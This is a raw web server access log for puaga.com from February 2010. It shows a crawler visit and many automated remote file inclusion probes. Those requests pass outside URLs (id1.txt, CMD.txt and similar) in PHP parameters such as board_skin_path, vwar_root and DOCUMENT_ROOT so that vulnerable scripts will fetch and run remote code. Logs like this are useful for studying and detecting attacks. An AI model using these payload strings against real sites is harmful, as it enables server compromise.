208.80.193.42 - - [08/Feb/2010:10:41:05 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)" "puaga.com"
69.16.230.82 - - [08/Feb/2010:10:41:26 -0800] "GET /logs/access_100104.log%20%20//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:42:30 -0800] "GET /logs/access_100106.log%20%20/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:42:30 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:42:30 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [08/Feb/2010:10:42:34 -0800] "GET /logs/access_100111.log%20%20//ashnews.php?pathtoashnews=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:43:25 -0800] "GET /logs/access_100109.log%20%20/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:00 -0800] "GET /logs/access_100112.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:00 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:00 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:00 -0800] "GET /logs/access_100108.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:02 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:02 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:02 -0800] "GET /logs/access_100108.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:02 -0800] "GET /logs/access_100112.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:38 -0800] "GET /logs/access_100108.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:38 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:38 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:44:39 -0800] "GET /logs/access_100112.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:10:45:41 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:10:45:41 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:10:45:41 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:09 -0800] "GET /pictures/p9 HTTP/1.0" 301 76 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:09 -0800] "GET /pictures/p9/ HTTP/1.0" 302 10320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:10 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:10 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:11 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:11 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [08/Feb/2010:10:46:11 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
209.59.163.57 - - [08/Feb/2010:10:48:07 -0800] "GET /logs/access_100115.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:10:48:07 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:10:48:07 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:49:30 -0800] "GET /logs/access_100109.log%20%20/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:49:30 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:49:30 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:49:30 -0800] "GET /logs/access_100106.log%20%20/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:10:50:05 -0800] "GET /logs/access_100112.log//setup.php?dir=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:10:50:06 -0800] "GET /setup.php?dir=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:10:50:06 -0800] "GET /logs//setup.php?dir=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:10:50:21 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:10:50:22 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:10:50:23 -0800] "GET /logs/access_100111.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:10:50:23 -0800] "GET /logs/access_100110.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:10:50:30 -0800] "GET /logs/access_100201.log//setup.php?dir=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:50:32 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:50:32 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:50:32 -0800] "GET /logs/access_100115.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:51:52 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:51:52 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:51:52 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:10:52:32 -0800] "GET /logs/access_100111.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:10:52:32 -0800] "GET /logs/access_100110.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:10:52:37 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
222.73.17.7 - - [08/Feb/2010:10:54:22 -0800] "GET /setup.php?dir=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:54:24 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:54:24 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:54:24 -0800] "GET /logs/access_100115.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:10:54:27 -0800] "GET /logs/access_100111.log////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:10:54:28 -0800] "GET /logs/access_100203.log///bbs/write_update.php?board_skin_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:54:35 -0800] "GET /logs//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:54:35 -0800] "GET /index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.207.8.238 - - [08/Feb/2010:10:54:39 -0800] "GET /logs/access_100110.log////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:54:44 -0800] "GET /logs/access_100106.log%20%20//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:55:37 -0800] "GET /logs/access_100109.log%20%20//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:10:56:05 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:10:56:05 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:10:56:05 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:10:56:06 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:56:10 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:56:10 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.246.76.241 - - [08/Feb/2010:10:56:28 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.246.76.241 - - [08/Feb/2010:10:56:28 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.246.76.241 - - [08/Feb/2010:10:56:29 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.246.76.241 - - [08/Feb/2010:10:56:30 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:56:45 -0800] "GET /logs/access_100104.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [08/Feb/2010:10:57:14 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [08/Feb/2010:10:57:14 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [08/Feb/2010:10:57:14 -0800] "GET /logs/access_100115.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [08/Feb/2010:10:57:28 -0800] "GET /logs/access_100111.log////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:57:28 -0800] "GET /logs/access_100110.log//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:57:38 -0800] "GET /logs/access_100110.log//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:57:48 -0800] "GET /logs/access_100125.log//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:57:48 -0800] "GET /bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:57:48 -0800] "GET /logs//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:57:52 -0800] "GET /logs/access_100126.log//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:58:14 -0800] "GET /logs/access_100104.log//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:58:15 -0800] "GET /bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:58:15 -0800] "GET /logs/access_100125.log//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:58:15 -0800] "GET /logs//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:58:18 -0800] "GET /logs/access_100104.log//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:58:20 -0800] "GET /logs/access_100126.log//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:10:58:35 -0800] "GET /logs/access_100129.log///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:10:58:36 -0800] "GET //bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:10:58:37 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
124.217.198.155 - - [08/Feb/2010:10:58:38 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [08/Feb/2010:10:58:38 -0800] "GET /logs/access_100115.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [08/Feb/2010:10:58:38 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:58:44 -0800] "GET /logs/access_100111.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:58:44 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:58:44 -0800] "GET /logs/access_100110.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:58:45 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:10:58:51 -0800] "GET /logs/access_100202.log///bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:10:59:38 -0800] "GET /logs/access_100109.log/convert/mvcw.php?step=1&vwar_root=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:11:00:18 -0800] "GET /logs//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:11:00:18 -0800] "GET /logs/access_100109.log%20%20//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:11:00:19 -0800] "GET /index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:11:00:23 -0800] "GET /logs/access_100106.log%20%20//index.php?r=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:11:00:47 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:11:00:47 -0800] "GET /e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:11:00:47 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [08/Feb/2010:11:00:57 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:11:01:21 -0800] "GET //bbs///delete_all.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:11:01:45 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:11:01:45 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:11:01:45 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:11:01:46 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:01:48 -0800] "GET /bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:01:48 -0800] "GET /logs/access_100125.log%20%20//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:01:48 -0800] "GET /logs//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:11:01:56 -0800] "GET /logs/access_100126.log%20%20//bbs/delete_comment.php?board.skin.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
